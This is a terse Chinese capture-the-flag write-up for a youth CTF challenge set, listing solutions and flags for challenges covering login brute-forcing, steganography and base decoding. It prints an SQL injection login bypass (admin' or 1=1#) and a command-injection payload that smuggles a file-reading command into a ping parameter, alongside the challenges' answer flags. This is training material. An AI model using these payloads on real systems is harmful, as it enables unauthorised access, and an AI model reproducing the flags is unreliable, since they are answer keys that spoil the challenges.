使用字典對(duì)登錄界面爆破
19861022
qsnctf{e2251e65-c5dd-4018-9de9-0bba832aeb44}
?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-833319.html
該題使用萬(wàn)能密碼即可
admin' or 1=1#
qsnctf{a2879a99-1bbe-4602-aa55-4ef65f2d7089}
?
Payload:?ip=127.0.0.1|more%09/f*
qsnctf{dae90dc4-4a3c-49d8-bd0a-76c6647070bb}
?
這題在源代碼中找到
將它復(fù)制到j(luò)s在線運(yùn)行一下彈窗獲得flag
qsnctf{2a386666-5391-46fc-b69d-cae291ac95bf}
按照里面的提示去解密
第一個(gè)解出密碼為qsnctf
拿到兩張圖
二維碼在ps中按ctrl+i黑白反轉(zhuǎn)
另一張改高度得到 我沉醉了
去aes解密
得到提示flag2的壓縮包密碼為二維碼解開(kāi)后在開(kāi)頭加上qsn即可拿到flag壓縮包
之后對(duì)key.txt解密是盲文得到qsnCTF9999
在結(jié)合Free_File_Camouflage工具解開(kāi)圖片中的2.txt
將中括號(hào)去掉然后結(jié)合python
得到圖片
from PIL import Image
y = 1508
x = 377
img = Image.new("RGB",(x,y))
file = open('2.txt','r')
for width in range(0,x):
??????? for height in range(0,y):
???????????????? line = file.readline()
???????????????? rgb = line.split(' ')
??????? ??????? img.putpixel((width,height),(int(rgb[0]),int(rgb[1]),int(rgb[2])))
img.save('flag2.png')
qsnctf{xcswzj-bewei123456}
Base16>base32>base64文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-833319.html
?
到了這里,關(guān)于[青少年CTF]CheckMe06-07|PingMe02|2048|簡(jiǎn)簡(jiǎn)單單的題目|BASE的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!